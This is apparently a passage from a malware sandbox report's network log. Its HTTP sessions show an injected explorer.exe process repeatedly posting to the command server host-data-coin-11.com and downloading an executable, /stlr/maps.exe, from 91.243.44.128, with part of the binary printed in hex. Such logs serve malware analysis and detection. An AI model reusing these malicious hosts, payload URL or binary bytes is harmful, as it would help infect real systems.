

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        57192.168.2.3498405.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:51.481900930 CET13453OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://jmtkjkpl.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 265
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:51.609328985 CET13454INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        58192.168.2.3498415.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:51.740044117 CET13455OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://fxnyg.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 201
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:51.855806112 CET13456INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        59192.168.2.3498425.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:51.964370966 CET13457OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://moteqo.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 212
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:52.088896036 CET13458INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:52 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        6192.168.2.349865104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        60192.168.2.3498435.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:52.249758959 CET13458OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://kuwxcr.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 145
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:52.361845016 CET13459INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:52 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        61192.168.2.3498445.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:52.456029892 CET13460OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://itvtw.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 299
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:52.572187901 CET13460INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:52 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 43 fc 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 2eI:82OU?ACSvDg2P0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        62192.168.2.34984591.243.44.12880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:52.684331894 CET13461OUTGET /stlr/maps.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: 91.243.44.128
                                                                                                                                                        Dec 28, 2021 03:23:52.748409033 CET13462INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:52 GMT
                                                                                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                        Last-Modified: Mon, 27 Dec 2021 19:51:47 GMT
                                                                                                                                                        ETag: "21af80-5d42608f7478b"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 2207616
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Data Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b 95 c0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2c 01 00 00 de 03 00 00 00 00 00 00 e0 4b 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 4d 00 00 04 00 00 90 20 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 49 00 54 01 00 00 00 80 49 00 9c 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 73 68 61 72 65 64 00 00 60 49 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 49 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 54 02 00 00 80 49 00 9c 54 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 44 41 54 41 00 00 00 00 00 80 01 00 00 e0 4b 00 47 7d 01 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 63 0b 89 02 9e c8 7a 45 47 cb 7a 99 64 7b f0 a6 27 04 76 d5 e2 36 1f 40 27 54 59 3d 06 0d c2 02 87 04 64 a6 a2 0e b2 65 d2 92 7d 55 82 c3 f7 d0 4a e8 a0 f1 03 6c 70 49 00
                                                                                                                                                        Data Ascii: MZog':(332fC'B{b+Rd:QPELKa,K@@`M "@pITIT.shared`I`.pdatapI@.rsrcTIT@@DATAKG}\@)czEGzd{'v6@'TY=de}UJlpI


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        63192.168.2.3498465.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:55.102603912 CET15781OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://bkepfdarq.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 286
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:55.215496063 CET15782INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        64192.168.2.3498475.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:55.333444118 CET15783OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://qqnjujtc.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 241
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:55.450396061 CET15784INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        65192.168.2.3498485.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:55.584682941 CET15785OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://wjossdwse.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 180
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:55.694448948 CET15786INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        66192.168.2.3498495.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:56.144112110 CET15786OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://pwwyvihpo.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 347
                                                                                                                                                        Host: host-data-coin-11.com
